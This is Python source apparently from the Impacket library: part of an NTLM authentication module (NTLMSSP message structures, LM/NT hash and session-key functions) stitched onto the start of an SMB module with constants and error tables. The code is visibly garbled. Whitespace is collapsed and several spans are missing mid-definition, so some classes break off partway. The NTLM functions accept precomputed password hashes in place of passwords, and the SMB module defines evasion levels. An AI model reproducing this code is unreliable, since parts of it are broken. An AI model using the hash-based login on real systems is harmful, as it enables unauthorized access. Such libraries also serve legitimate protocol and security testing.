self['flags'] |= NTLMSSP_DOMAIN if len(self.fields['os_version']) > 0: self['flags'] |= NTLMSSP_VERSION if (self['flags'] & NTLMSSP_VERSION) == NTLMSSP_VERSION: version_len = 8 else: version_len = 0 if (self['flags'] & NTLMSSP_WORKSTATION) == NTLMSSP_WORKSTATION: self['host_offset']=32 + version_len if (self['flags'] & NTLMSSP_DOMAIN) == NTLMSSP_DOMAIN: self['domain_offset']=32+len(self['host_name']) + version_len return Structure.getData(self) def fromString(self,data): Structure.fromString(self,data) domain_offset = self['domain_offset'] domain_end = self['domain_len'] + domain_offset self['domain_name'] = data[ domain_offset : domain_end ] host_offset = self['host_offset'] host_end = self['host_len'] + host_offset self['host_name'] = data[ host_offset : host_end ] hasOsInfo = self['flags'] & NTLMSSP_VERSION if len(data) >= 36 and hasOsInfo: self['os_version'] = data[32:40] else: self['os_version'] = '' class DCERPC_NTLMAuthNegotiate(NTLMAuthNegotiate,DCERPC_NTLMAuthHeader): commonHdr = DCERPC_NTLMAuthHeader.commonHdr class NTLMAuthChallenge(Structure): structure = ( ('','"NTLMSSP\x00'), ('message_type',' 0: # av_pairs = AV_PAIRS(self['TargetInfoFields'][:self['TargetInfoFields_len']]) # self['TargetInfoFields'] = av_pairs return self class DCERPC_NTLMAuthChallenge(NTLMAuthChallenge,DCERPC_NTLMAuthHeader): commonHdr = DCERPC_NTLMAuthHeader.commonHdr class NTLMAuthChallengeResponse(Structure, NTLMAuthMixin): structure = ( ('','"NTLMSSP\x00'), ('message_type','= 36: # self['os_version'] = data[32:36] #else: # self['os_version'] = '' class DCERPC_NTLMAuthChallengeResponse(NTLMAuthChallengeResponse,DCERPC_NTLMAuthHeader): commonHdr = DCERPC_NTLMAuthHeader.commonHdr class ImpacketStructure(Structure): def set_parent(self, other): self.parent = other def get_packet(self): return str(self) def get_size(self): return len(self) class ExtendedOrNotMessageSignature(Structure): def __init__(self, flags = 0, **kargs): if flags & NTLMSSP_NTLM2_KEY: self.structure = self.extendedMessageSignature else: self.structure = self.MessageSignature return Structure.__init__(self, **kargs) class NTLMMessageSignature(ExtendedOrNotMessageSignature): extendedMessageSignature = ( ('Version','> 1) & 0x7f) << 1) s = s + chr(((ord(key[0]) & 0x01) << 6 | ((ord(key[1]) >> 2) & 0x3f)) << 1) s = s + chr(((ord(key[1]) & 0x03) << 5 | ((ord(key[2]) >> 3) & 0x1f)) << 1) s = s + chr(((ord(key[2]) & 0x07) << 4 | ((ord(key[3]) >> 4) & 0x0f)) << 1) s = s + chr(((ord(key[3]) & 0x0f) << 3 | ((ord(key[4]) >> 5) & 0x07)) << 1) s = s + chr(((ord(key[4]) & 0x1f) << 2 | ((ord(key[5]) >> 6) & 0x03)) << 1) s = s + chr(((ord(key[5]) & 0x3f) << 1 | ((ord(key[6]) >> 7) & 0x01)) << 1) s = s + chr((ord(key[6]) & 0x7f) << 1) return s def __DES_block(key, msg): if POW: cipher = POW.Symmetric(POW.DES_ECB) cipher.encryptInit(__expand_DES_key(key)) return cipher.update(msg) else: cipher = DES.new(__expand_DES_key(key),DES.MODE_ECB) return cipher.encrypt(msg) def ntlmssp_DES_encrypt(key, challenge): answer = __DES_block(key[:7], challenge) answer += __DES_block(key[7:14], challenge) answer += __DES_block(key[14:], challenge) return answer # High level functions to use NTLMSSP def getNTLMSSPType1(workstation='', domain='', signingRequired = False, isDCE = False, use_ntlmv2 = USE_NTLMv2): # Let's prepare a Type 1 NTLMSSP Message if isDCE is True: auth = DCERPC_NTLMAuthNegotiate() else: auth = NTLMAuthNegotiate() auth['flags']=0 if signingRequired: auth['flags'] = NTLMSSP_KEY_EXCHANGE | NTLMSSP_SIGN | NTLMSSP_ALWAYS_SIGN | NTLMSSP_SEAL if use_ntlmv2: auth['flags'] |= NTLMSSP_TARGET_INFO auth['flags'] |= NTLMSSP_NTLM_KEY | NTLMSSP_NTLM2_KEY | NTLMSSP_UNICODE | NTLMSSP_TARGET | NTLMSSP_KEY_128 | NTLMSSP_KEY_56 auth['domain_name'] = domain return auth def getNTLMSSPType3(type1, type2, user, password, domain, lmhash = '', nthash = '', isDCE = False, use_ntlmv2 = USE_NTLMv2): if isDCE is True: ntlmChallenge = DCERPC_NTLMAuthChallenge(type2) else: ntlmChallenge = NTLMAuthChallenge(type2) # Let's start with the original flags sent in the type1 message responseFlags = type1['flags'] # Token received and parsed. Depending on the authentication # method we will create a valid ChallengeResponse if isDCE is True: ntlmChallengeResponse = DCERPC_NTLMAuthChallengeResponse(user, password, ntlmChallenge['challenge']) else: ntlmChallengeResponse = NTLMAuthChallengeResponse(user, password, ntlmChallenge['challenge']) clientChallenge = "".join([random.choice(string.digits+string.letters) for i in xrange(8)]) serverName = ntlmChallenge['TargetInfoFields'] ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 ) # Let's check the return flags if (ntlmChallenge['flags'] & NTLMSSP_NTLM2_KEY) == 0: # No extended session security, taking it out responseFlags &= 0xffffffff ^ NTLMSSP_NTLM2_KEY if (ntlmChallenge['flags'] & NTLMSSP_KEY_128 ) == 0: # No support for 128 key len, taking it out responseFlags &= 0xffffffff ^ NTLMSSP_KEY_128 if (ntlmChallenge['flags'] & NTLMSSP_KEY_EXCHANGE) == 0: # No key exchange supported, taking it out responseFlags &= 0xffffffff ^ NTLMSSP_KEY_EXCHANGE if (ntlmChallenge['flags'] & NTLMSSP_SEAL) == 0: # No sign available, taking it out responseFlags &= 0xffffffff ^ NTLMSSP_SEAL if (ntlmChallenge['flags'] & NTLMSSP_SIGN) == 0: # No sign available, taking it out responseFlags &= 0xffffffff ^ NTLMSSP_SIGN if (ntlmChallenge['flags'] & NTLMSSP_ALWAYS_SIGN) == 0: # No sign available, taking it out responseFlags &= 0xffffffff ^ NTLMSSP_ALWAYS_SIGN keyExchangeKey = KXKEY(ntlmChallenge['flags'],sessionBaseKey, lmResponse, ntlmChallenge['challenge'], password, lmhash, nthash,use_ntlmv2) # Special case for anonymous login if user == '' and password == '' and lmhash == '' and nthash == '': keyExchangeKey = '\x00'*16 # If we set up key exchange, let's fill the right variables if ntlmChallenge['flags'] & NTLMSSP_KEY_EXCHANGE: # not exactly what I call random tho :\ # exportedSessionKey = this is the key we should use to sign exportedSessionKey = "".join([random.choice(string.digits+string.letters) for i in xrange(16)]) #exportedSessionKey = "A"*16 #print "keyExchangeKey %r" % keyExchangeKey # Let's generate the right session key based on the challenge flags #if responseFlags & NTLMSSP_NTLM2_KEY: # Extended session security enabled # if responseFlags & NTLMSSP_KEY_128: # Full key # exportedSessionKey = exportedSessionKey # elif responseFlags & NTLMSSP_KEY_56: # Only 56-bit key # exportedSessionKey = exportedSessionKey[:7] # else: # exportedSessionKey = exportedSessionKey[:5] #elif responseFlags & NTLMSSP_KEY_56: # No extended session security, just 56 bits key # exportedSessionKey = exportedSessionKey[:7] + '\xa0' #else: # exportedSessionKey = exportedSessionKey[:5] + '\xe5\x38\xb0' encryptedRandomSessionKey = generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey) else: encryptedRandomSessionKey = None # [MS-NLMP] page 46 exportedSessionKey = keyExchangeKey ntlmChallengeResponse['flags'] = responseFlags ntlmChallengeResponse['domain_name'] = domain.encode('utf-16le') ntlmChallengeResponse['lanman'] = lmResponse ntlmChallengeResponse['ntlm'] = ntResponse if encryptedRandomSessionKey is not None: ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey return ntlmChallengeResponse, exportedSessionKey # NTLMv1 Algorithm def generateSessionKeyV1(password, lmhash, nthash): if POW: hash = POW.Digest(POW.MD4_DIGEST) else: hash = MD4.new() hash.update(NTOWFv1(password, lmhash, nthash)) return hash.digest() def computeResponseNTLMv1(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash='', nthash='', use_ntlmv2 = USE_NTLMv2): if (user == '' and password == ''): # Special case for anonymous authentication lmResponse = '' ntResponse = '' else: lmhash = LMOWFv1(password, lmhash, nthash) nthash = NTOWFv1(password, lmhash, nthash) if flags & NTLMSSP_LM_KEY: ntResponse = '' lmResponse = get_ntlmv1_response(lmhash, serverChallenge) elif flags & NTLMSSP_NTLM2_KEY: md5 = hashlib.new('md5') chall = (serverChallenge + clientChallenge) md5.update(chall) ntResponse = ntlmssp_DES_encrypt(nthash, md5.digest()[:8]) lmResponse = clientChallenge + '\x00'*16 else: ntResponse = get_ntlmv1_response(nthash,serverChallenge) lmResponse = get_ntlmv1_response(lmhash, serverChallenge) sessionBaseKey = generateSessionKeyV1(password, lmhash, nthash) return ntResponse, lmResponse, sessionBaseKey def compute_lmhash(password): # This is done according to Samba's encryption specification (docs/html/ENCRYPTION.html) password = password.upper() lmhash = __DES_block(password[:7], KNOWN_DES_INPUT) lmhash += __DES_block(password[7:14], KNOWN_DES_INPUT) return lmhash def NTOWFv1(password, lmhash = '', nthash=''): if nthash != '': return nthash return compute_nthash(password) def LMOWFv1(password, lmhash = '', nthash=''): if lmhash != '': return lmhash return compute_lmhash(password) def compute_nthash(password): # This is done according to Samba's encryption specification (docs/html/ENCRYPTION.html) password = unicode(password).encode('utf_16le') if POW: hash = POW.Digest(POW.MD4_DIGEST) else: hash = MD4.new() hash.update(password) return hash.digest() def get_ntlmv1_response(key, challenge): return ntlmssp_DES_encrypt(key, challenge) # NTLMv2 Algorithm - as described in MS-NLMP Section 3.3.2 # Crypto Stuff def MAC(flags, handle, signingKey, seqNum, message, isDCE = False): # [MS-NLMP] Section 3.4.4 # Returns the right messageSignature depending on the flags if isDCE is True: messageSignature = DCERPC_NTLMMessageSignature(flags) else: messageSignature = NTLMMessageSignature(flags) if flags & NTLMSSP_NTLM2_KEY: if flags & NTLMSSP_KEY_EXCHANGE: messageSignature['Version'] = 1 messageSignature['Checksum'] = struct.unpack(' Local Policies -> Security Options -> Server SPN target name validation level av_pairs[NTLMSSP_AV_TARGET_NAME] = 'cifs/'.encode('utf-16le') + av_pairs[NTLMSSP_AV_HOSTNAME][1] if av_pairs[NTLMSSP_AV_TIME] is not None: aTime = av_pairs[NTLMSSP_AV_TIME][1] else: aTime = struct.pack(' # smb.py - SMB/CIFS library # # This software is provided 'as-is', without any express or implied warranty. # In no event will the author be held liable for any damages arising from the # use of this software. # # Permission is granted to anyone to use this software for any purpose, # including commercial applications, and to alter it and redistribute it # freely, subject to the following restrictions: # # 1. The origin of this software must not be misrepresented; you must not # claim that you wrote the original software. If you use this software # in a product, an acknowledgment in the product documentation would be # appreciated but is not required. # # 2. Altered source versions must be plainly marked as such, and must not be # misrepresented as being the original software. # # 3. This notice cannot be removed or altered from any source distribution. # # Altered source done by Alberto Solino # Todo: # [ ] Try [SMB]transport fragmentation using Transact requests # [ ] Try other methods of doing write (write_raw, transact2, write, write_and_unlock, write_and_close, write_mpx) # [-] Try replacements for SMB_COM_NT_CREATE_ANDX (CREATE, T_TRANSACT_CREATE, OPEN_ANDX works # [x] Fix forceWriteAndx, which needs to send a RecvRequest, because recv() will not send it # [x] Fix Recv() when using RecvAndx and the answer comes splet in several packets # [ ] Try [SMB]transport fragmentation with overlaping segments # [ ] Try [SMB]transport fragmentation with out of order segments # [x] Do chained AndX requests # [ ] Transform the rest of the calls to structure # [ ] Implement TRANS/TRANS2 reassembly for list_path import os, sys, socket, string, re, select, errno from impacket import nmb, ntlm from impacket.dcerpc import samr from impacket.structure import Structure from impacket.spnego import * import types from binascii import a2b_hex import random import datetime, time from random import randint from struct import * import struct from contextlib import contextmanager # For signing import hashlib unicode_support = 0 unicode_convert = 1 try: from cStringIO import StringIO except ImportError: from StringIO import StringIO # Dialect for SMB1 SMB_DIALECT = 'NT LM 0.12' # Shared Device Type SHARED_DISK = 0x00 SHARED_DISK_HIDDEN = 0x80000000 SHARED_PRINT_QUEUE = 0x01 SHARED_DEVICE = 0x02 SHARED_IPC = 0x03 # Extended attributes mask ATTR_ARCHIVE = 0x020 ATTR_COMPRESSED = 0x800 ATTR_NORMAL = 0x080 ATTR_HIDDEN = 0x002 ATTR_READONLY = 0x001 ATTR_TEMPORARY = 0x100 ATTR_DIRECTORY = 0x010 ATTR_SYSTEM = 0x004 # Service Type SERVICE_DISK = 'A:' SERVICE_PRINTER = 'LPT1:' SERVICE_IPC = 'IPC' SERVICE_COMM = 'COMM' SERVICE_ANY = '?????' # Server Type (Can be used to mask with SMBMachine.get_type() or SMBDomain.get_type()) SV_TYPE_WORKSTATION = 0x00000001 SV_TYPE_SERVER = 0x00000002 SV_TYPE_SQLSERVER = 0x00000004 SV_TYPE_DOMAIN_CTRL = 0x00000008 SV_TYPE_DOMAIN_BAKCTRL = 0x00000010 SV_TYPE_TIME_SOURCE = 0x00000020 SV_TYPE_AFP = 0x00000040 SV_TYPE_NOVELL = 0x00000080 SV_TYPE_DOMAIN_MEMBER = 0x00000100 SV_TYPE_PRINTQ_SERVER = 0x00000200 SV_TYPE_DIALIN_SERVER = 0x00000400 SV_TYPE_XENIX_SERVER = 0x00000800 SV_TYPE_NT = 0x00001000 SV_TYPE_WFW = 0x00002000 SV_TYPE_SERVER_NT = 0x00004000 SV_TYPE_POTENTIAL_BROWSER = 0x00010000 SV_TYPE_BACKUP_BROWSER = 0x00020000 SV_TYPE_MASTER_BROWSER = 0x00040000 SV_TYPE_DOMAIN_MASTER = 0x00080000 SV_TYPE_LOCAL_LIST_ONLY = 0x40000000 SV_TYPE_DOMAIN_ENUM = 0x80000000 # Options values for SMB.stor_file and SMB.retr_file SMB_O_CREAT = 0x10 # Create the file if file does not exists. Otherwise, operation fails. SMB_O_EXCL = 0x00 # When used with SMB_O_CREAT, operation fails if file exists. Cannot be used with SMB_O_OPEN. SMB_O_OPEN = 0x01 # Open the file if the file exists SMB_O_TRUNC = 0x02 # Truncate the file if the file exists # Share Access Mode SMB_SHARE_COMPAT = 0x00 SMB_SHARE_DENY_EXCL = 0x10 SMB_SHARE_DENY_WRITE = 0x20 SMB_SHARE_DENY_READEXEC = 0x30 SMB_SHARE_DENY_NONE = 0x40 SMB_ACCESS_READ = 0x00 SMB_ACCESS_WRITE = 0x01 SMB_ACCESS_READWRITE = 0x02 SMB_ACCESS_EXEC = 0x03 TRANS_DISCONNECT_TID = 1 TRANS_NO_RESPONSE = 2 STATUS_SUCCESS = 0x00000000 STATUS_LOGON_FAILURE = 0xC000006D STATUS_LOGON_TYPE_NOT_GRANTED = 0xC000015B MAX_TFRAG_SIZE = 5840 EVASION_NONE = 0 EVASION_LOW = 1 EVASION_HIGH = 2 EVASION_MAX = 3 RPC_X_BAD_STUB_DATA = 0x6F7 # SMB_FILE_ATTRIBUTES SMB_FILE_ATTRIBUTE_NORMAL = 0x0000 SMB_FILE_ATTRIBUTE_READONLY = 0x0001 SMB_FILE_ATTRIBUTE_HIDDEN = 0x0002 SMB_FILE_ATTRIBUTE_SYSTEM = 0x0004 SMB_FILE_ATTRIBUTE_VOLUME = 0x0008 SMB_FILE_ATTRIBUTE_DIRECORY = 0x0010 SMB_FILE_ATTRIBUTE_ARCHIVE = 0x0020 SMB_SEARCH_ATTRIBUTE_READONLY = 0x0100 SMB_SEARCH_ATTRIBUTE_HIDDEN = 0x0200 SMB_SEARCH_ATTRIBUTE_SYSTEM = 0x0400 SMB_SEARCH_ATTRIBUTE_DIRECTORY = 0x1000 SMB_SEARCH_ATTRIBUTE_ARCHIVE = 0x2000 # Session SetupAndX Action flags SMB_SETUP_GUEST = 0x01 SMB_SETUP_USE_LANMAN_KEY = 0x02 # QUERY_INFORMATION levels SMB_INFO_ALLOCATION = 0x0001 SMB_INFO_VOLUME = 0x0002 SMB_QUERY_FS_VOLUME_INFO = 0x0102 SMB_QUERY_FS_SIZE_INFO = 0x0103 SMB_QUERY_FILE_EA_INFO = 0x0103 SMB_QUERY_FS_DEVICE_INFO = 0x0104 SMB_QUERY_FS_ATTRIBUTE_INFO = 0x0105 SMB_QUERY_FILE_BASIC_INFO = 0x0101 SMB_QUERY_FILE_STANDARD_INFO = 0x0102 SMB_QUERY_FILE_ALL_INFO = 0x0107 # SET_INFORMATION levels SMB_SET_FILE_DISPOSITION_INFO = 0x0102 SMB_SET_FILE_BASIC_INFO = 0x0101 SMB_SET_FILE_END_OF_FILE_INFO = 0x0104 # File System Attributes FILE_CASE_SENSITIVE_SEARCH = 0x00000001 FILE_CASE_PRESERVED_NAMES = 0x00000002 FILE_UNICODE_ON_DISK = 0x00000004 FILE_PERSISTENT_ACLS = 0x00000008 FILE_FILE_COMPRESSION = 0x00000010 FILE_VOLUME_IS_COMPRESSED = 0x00008000 # FIND_FIRST2 flags and levels SMB_FIND_CLOSE_AFTER_REQUEST = 0x0001 SMB_FIND_CLOSE_AT_EOS = 0x0002 SMB_FIND_RETURN_RESUME_KEYS = 0x0004 SMB_FIND_CONTINUE_FROM_LAST = 0x0008 SMB_FIND_WITH_BACKUP_INTENT = 0x0010 FILE_DIRECTORY_FILE = 0x00000001 FILE_DELETE_ON_CLOSE = 0x00001000 FILE_NON_DIRECTORY_FILE = 0x00000040 SMB_FIND_INFO_STANDARD = 0x0001 SMB_FIND_FILE_DIRECTORY_INFO = 0x0101 SMB_FIND_FILE_FULL_DIRECTORY_INFO= 0x0102 SMB_FIND_FILE_NAMES_INFO = 0x0103 SMB_FIND_FILE_BOTH_DIRECTORY_INFO= 0x0104 SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO = 0x105 SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO = 0x106 # DesiredAccess flags FILE_READ_DATA = 0x00000001 FILE_WRITE_DATA = 0x00000002 FILE_APPEND_DATA = 0x00000004 FILE_EXECUTE = 0x00000020 MAXIMUM_ALLOWED = 0200000000 GENERIC_ALL = 0x10000000 GENERIC_EXECUTE = 0x20000000 GENERIC_WRITE = 0x40000000 GENERIC_READ = 0x80000000 # ShareAccess flags FILE_SHARE_NONE = 0x00000000 FILE_SHARE_READ = 0x00000001 FILE_SHARE_WRITE = 0x00000002 FILE_SHARE_DELETE = 0x00000004 # CreateDisposition flags FILE_SUPERSEDE = 0x00000000 FILE_OPEN = 0x00000001 FILE_CREATE = 0x00000002 FILE_OPEN_IF = 0x00000003 FILE_OVERWRITE = 0x00000004 FILE_OVERWRITE_IF = 0x00000005 def strerror(errclass, errcode): if errclass == 0x01: return 'OS error', ERRDOS.get(errcode, 'Unknown error') elif errclass == 0x02: return 'Server error', ERRSRV.get(errcode, 'Unknown error') elif errclass == 0x03: return 'Hardware error', ERRHRD.get(errcode, 'Unknown error') # This is not a standard error class for SMB #elif errclass == 0x80: # return 'Browse error', ERRBROWSE.get(errcode, 'Unknown error') elif errclass == 0xff: return 'Bad command', 'Bad command. Please file bug report' else: return 'Unknown error', 'Unknown error' # Raised when an error has occured during a session class SessionError(Exception): # SMB X/Open error codes for the ERRDOS error class ERRsuccess = 0 ERRbadfunc = 1 ERRbadfile = 2 ERRbadpath = 3 ERRnofids = 4 ERRnoaccess = 5 ERRbadfid = 6 ERRbadmcb = 7 ERRnomem = 8 ERRbadmem = 9 ERRbadenv = 10 ERRbadaccess = 12 ERRbaddata = 13 ERRres = 14 ERRbaddrive = 15 ERRremcd = 16 ERRdiffdevice = 17 ERRnofiles = 18 ERRgeneral = 31 ERRbadshare = 32 ERRlock = 33 ERRunsup = 50 ERRnetnamedel = 64 ERRnosuchshare = 67 ERRfilexists = 80 ERRinvalidparam = 87 ERRcannotopen = 110 ERRinsufficientbuffer = 122 ERRinvalidname = 123 ERRunknownlevel = 124 ERRnotlocked = 158 ERRrename = 183 ERRbadpipe = 230 ERRpipebusy = 231 ERRpipeclosing = 232 ERRnotconnected = 233 ERRmoredata = 234 ERRnomoreitems = 259 ERRbaddirectory = 267 ERReasnotsupported = 282 ERRlogonfailure = 1326 ERRbuftoosmall = 2123 ERRunknownipc = 2142 ERRnosuchprintjob = 2151 ERRinvgroup = 2455 # here's a special one from observing NT ERRnoipc = 66 # These errors seem to be only returned by the NT printer driver system ERRdriveralreadyinstalled = 1795 ERRunknownprinterport = 1796 ERRunknownprinterdriver = 1797 ERRunknownprintprocessor = 1798 ERRinvalidseparatorfile = 1799 ERRinvalidjobpriority = 1800 ERRinvalidprintername = 1801 ERRprinteralreadyexists = 1802 ERRinvalidprintercommand = 1803 ERRinvaliddatatype = 1804 ERRinvalidenvironment = 1805 ERRunknownprintmonitor = 3000 ERRprinterdriverinuse = 3001 ERRspoolfilenotfound = 3002 ERRnostartdoc = 3003 ERRnoaddjob = 3004 ERRprintprocessoralreadyinstalled = 3005 ERRprintmonitoralreadyinstalled = 3006 ERRinvalidprintmonitor = 3007 ERRprintmonitorinuse = 3008 ERRprinterhasjobsqueued = 3009 # Error codes for the ERRSRV class ERRerror = 1 ERRbadpw = 2 ERRbadtype = 3 ERRaccess = 4 ERRinvnid = 5 ERRinvnetname = 6 ERRinvdevice = 7 ERRqfull = 49 ERRqtoobig = 50 ERRinvpfid = 52 ERRsmbcmd = 64 ERRsrverror = 65 ERRfilespecs = 67 ERRbadlink = 68 ERRbadpermits = 69 ERRbadpid = 70 ERRsetattrmode = 71 ERRpaused = 81 ERRmsgoff = 82 ERRnoroom = 83 ERRrmuns = 87 ERRtimeout = 88 ERRnoresource = 89 ERRtoomanyuids = 90 ERRbaduid = 91 ERRuseMPX = 250 ERRuseSTD = 251 ERRcontMPX = 252 ERRbadPW = None ERRnosupport = 0 ERRunknownsmb = 22 # Error codes for the ERRHRD class ERRnowrite = 19 ERRbadunit = 20 ERRnotready = 21 ERRbadcmd = 22 ERRdata = 23 ERRbadreq = 24 ERRseek = 25 ERRbadmedia = 26 ERRbadsector = 27 ERRnopaper = 28 ERRwrite = 29 ERRread = 30 ERRgeneral = 31 ERRwrongdisk = 34 ERRFCBunavail = 35 ERRsharebufexc = 36 ERRdiskfull = 39 hard_msgs = { 19: ("ERRnowrite", "Attempt to write on write-protected diskette."), 20: ("ERRbadunit", "Unknown unit."), 21: ("ERRnotready", "Drive not ready."), 22: ("ERRbadcmd", "Unknown command."), 23: ("ERRdata", "Data error (CRC)."), 24: ("ERRbadreq", "Bad request structure length."), 25: ("ERRseek", "Seek error."), 26: ("ERRbadmedia", "Unknown media type."), 27: ("ERRbadsector", "Sector not found."), 28: ("ERRnopaper", "Printer out of paper."), 29: ("ERRwrite", "Write fault."), 30: ("ERRread", "Read fault."), 31: ("ERRgeneral", "General failure."), 32: ("ERRbadshare", "An open conflicts with an existing open."), 33: ("ERRlock", "A Lock request conflicted with an existing lock or specified an invalid mode, or an Unlock requested attempted to remove a lock held by another process."), 34: ("ERRwrongdisk", "The wrong disk was found in a drive."), 35: ("ERRFCBUnavail", "No FCBs are available to process request."), 36: ("ERRsharebufexc", "A sharing buffer has been exceeded.") } nt_msgs = { 0x0000: ("STATUS_SUCCESS","The operation completed successfully."), 0x0001: ("STATUS_UNSUCCESSFUL","A device attached to the system is not functioning."), 0x0002: ("STATUS_NOT_IMPLEMENTED","Incorrect function."), 0x0003: ("STATUS_INVALID_INFO_CLASS","The parameter is incorrect."), 0x0004: ("STATUS_INFO_LENGTH_MISMATCH","The program issued a command but the command length is incorrect."), 0x0005: ("STATUS_ACCESS_VIOLATION","Invalid access to memory location."), 0x0006: ("STATUS_IN_PAGE_ERROR","Error performing inpage operation."), 0x0007: ("STATUS_PAGEFILE_QUOTA","Insufficient quota to complete the requested service."), 0x0008: ("STATUS_INVALID_HANDLE","The handle is invalid."), 0x0009: ("STATUS_BAD_INITIAL_STACK","Recursion too deep, stack overflowed."), 0x000a: ("STATUS_BAD_INITIAL_PC","Not a valid Windows NT application."), 0x000b: ("STATUS_INVALID_CID","The parameter is incorrect."), 0x000c: ("STATUS_TIMER_NOT_CANCELED","STATUS_TIMER_NOT_CANCELED"), 0x000d: ("STATUS_INVALID_PARAMETER","The parameter is incorrect."), 0x000e: ("STATUS_NO_SUCH_DEVICE","The system cannot find the file specified."), 0x000f: ("STATUS_NO_SUCH_FILE","The system cannot find the file specified."), 0x0010: ("STATUS_INVALID_DEVICE_REQUEST","Incorrect function."), 0x0011: ("STATUS_END_OF_FILE","Reached end of file."), 0x0012: ("STATUS_WRONG_VOLUME","The wrong diskette is in the drive. Insert %2 (Volume Serial Number: %3) into drive %1."), 0x0013: ("STATUS_NO_MEDIA_IN_DEVICE","The device is not ready."), 0x0014: ("STATUS_UNRECOGNIZED_MEDIA","The disk media is not recognized. It may not be formatted."), 0x0015: ("STATUS_NONEXISTENT_SECTOR","The drive cannot find the sector requested."), 0x0016: ("STATUS_MORE_PROCESSING_REQUIRED","More data is available."), 0x0017: ("STATUS_NO_MEMORY","Not enough storage is available to process this command."), 0x0018: ("STATUS_CONFLICTING_ADDRESSES","Attempt to access invalid address."), 0x0019: ("STATUS_NOT_MAPPED_VIEW","Attempt to access invalid address."), 0x001a: ("STATUS_UNABLE_TO_FREE_VM","The parameter is incorrect."), 0x001b: ("STATUS_UNABLE_TO_DELETE_SECTION","The parameter is incorrect."), 0x001c: ("STATUS_INVALID_SYSTEM_SERVICE","Incorrect function."), 0x001d: ("STATUS_ILLEGAL_INSTRUCTION","STATUS_ILLEGAL_INSTRUCTION"), 0x001e: ("STATUS_INVALID_LOCK_SEQUENCE","Access is denied."), 0x001f: ("STATUS_INVALID_VIEW_SIZE","Access is denied."), 0x0020: ("STATUS_INVALID_FILE_FOR_SECTION","Not a valid Windows NT application."), 0x0021: ("STATUS_ALREADY_COMMITTED","Access is denied."), 0x0022: ("STATUS_ACCESS_DENIED","Access is denied."), 0x0023: ("STATUS_BUFFER_TOO_SMALL","The data area passed to a system call is too small."), 0x0024: ("STATUS_OBJECT_TYPE_MISMATCH","The handle is invalid."), 0x0025: ("STATUS_NONCONTINUABLE_EXCEPTION","STATUS_NONCONTINUABLE_EXCEPTION"), 0x0026: ("STATUS_INVALID_DISPOSITION","STATUS_INVALID_DISPOSITION"), 0x0027: ("STATUS_UNWIND","STATUS_UNWIND"), 0x0028: ("STATUS_BAD_STACK","STATUS_BAD_STACK"), 0x0029: ("STATUS_INVALID_UNWIND_TARGET","STATUS_INVALID_UNWIND_TARGET"), 0x002a: ("STATUS_NOT_LOCKED","The segment is already unlocked."), 0x002b: ("STATUS_PARITY_ERROR","STATUS_PARITY_ERROR"), 0x002c: ("STATUS_UNABLE_TO_DECOMMIT_VM","Attempt to access invalid address."), 0x002d: ("STATUS_NOT_COMMITTED","Attempt to access invalid address."), 0x002e: ("STATUS_INVALID_PORT_ATTRIBUTES","STATUS_INVALID_PORT_ATTRIBUTES"), 0x002f: ("STATUS_PORT_MESSAGE_TOO_LONG","STATUS_PORT_MESSAGE_TOO_LONG"), 0x0030: ("STATUS_INVALID_PARAMETER_MIX","The parameter is incorrect."), 0x0031: ("STATUS_INVALID_QUOTA_LOWER","STATUS_INVALID_QUOTA_LOWER"), 0x0032: ("STATUS_DISK_CORRUPT_ERROR","The disk structure is corrupt and non-readable."), 0x0033: ("STATUS_OBJECT_NAME_INVALID","The filename, directory name, or volume label syntax is incorrect."), 0x0034: ("STATUS_OBJECT_NAME_NOT_FOUND","The system cannot find the file specified."), 0x0035: ("STATUS_OBJECT_NAME_COLLISION","Cannot create a file when that file already exists."), 0x0036: ("STATUS_HANDLE_NOT_WAITABLE","STATUS_HANDLE_NOT_WAITABLE"), 0x0037: ("STATUS_PORT_DISCONNECTED","The handle is invalid."), 0x0038: ("STATUS_DEVICE_ALREADY_ATTACHED","STATUS_DEVICE_ALREADY_ATTACHED"), 0x0039: ("STATUS_OBJECT_PATH_INVALID","The specified path is invalid."), 0x003a: ("STATUS_OBJECT_PATH_NOT_FOUND","The system cannot find the path specified."), 0x003b: ("STATUS_OBJECT_PATH_SYNTAX_BAD","The specified path is invalid."), 0x003c: ("STATUS_DATA_OVERRUN","The request could not be performed because of an I/O device error."), 0x003d: ("STATUS_DATA_LATE_ERROR","The request could not be performed because of an I/O device error."), 0x003e: ("STATUS_DATA_ERROR","Data error (cyclic redundancy check)"), 0x003f: ("STATUS_CRC_ERROR","Data error (cyclic redundancy check)"), 0x0040: ("STATUS_SECTION_TOO_BIG","Not enough storage is available to process this command."), 0x0041: ("STATUS_PORT_CONNECTION_REFUSED","Access is denied."), 0x0042: ("STATUS_INVALID_PORT_HANDLE","The handle is invalid."), 0x0043: ("STATUS_SHARING_VIOLATION","The process cannot access the file because it is being used by another process."), 0x0044: ("STATUS_QUOTA_EXCEEDED","Not enough quota is available to process this command."), 0x0045: ("STATUS_INVALID_PAGE_PROTECTION","The parameter is incorrect."), 0x0046: ("STATUS_MUTANT_NOT_OWNED","Attempt to release mutex not owned by caller."), 0x0047: ("STATUS_SEMAPHORE_LIMIT_EXCEEDED","Too many posts were made to a semaphore."), 0x0048: ("STATUS_PORT_ALREADY_SET","The parameter is incorrect."), 0x0049: ("STATUS_SECTION_NOT_IMAGE","The parameter is incorrect."), 0x004a: ("STATUS_SUSPEND_COUNT_EXCEEDED","The recipient process has refused the signal."), 0x004b: ("STATUS_THREAD_IS_TERMINATING","Access is denied."), 0x004c: ("STATUS_BAD_WORKING_SET_LIMIT","The parameter is incorrect."), 0x004d: ("STATUS_INCOMPATIBLE_FILE_MAP","The parameter is incorrect."), 0x004e: ("STATUS_SECTION_PROTECTION","The parameter is incorrect."), 0x004f: ("STATUS_EAS_NOT_SUPPORTED","STATUS_EAS_NOT_SUPPORTED"), 0x0050: ("STATUS_EA_TOO_LARGE","The extended attributes are inconsistent."), 0x0051: ("STATUS_NONEXISTENT_EA_ENTRY","The file or directory is corrupt and non-readable."), 0x0052: ("STATUS_NO_EAS_ON_FILE","The file or directory is corrupt and non-readable."), 0x0053: ("STATUS_EA_CORRUPT_ERROR","The file or directory is corrupt and non-readable."), 0x0054: 